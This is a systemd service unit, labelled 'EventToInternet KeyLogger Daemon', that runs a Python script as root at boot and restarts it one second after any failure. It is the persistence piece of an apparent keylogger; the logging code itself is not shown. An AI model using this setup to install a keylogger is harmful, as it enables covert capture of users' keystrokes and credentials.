[Unit]
Description=EventToInternet KeyLogger Daemon
After=multi-user.target
[Service]
WorkingDirectory=/etc/systemd/system/EventToInternet
ExecStart=/bin/sh -c "/bin/python3 async_executor.py"
User=root
Type=simple
Restart=on-failure
RestartSec=1
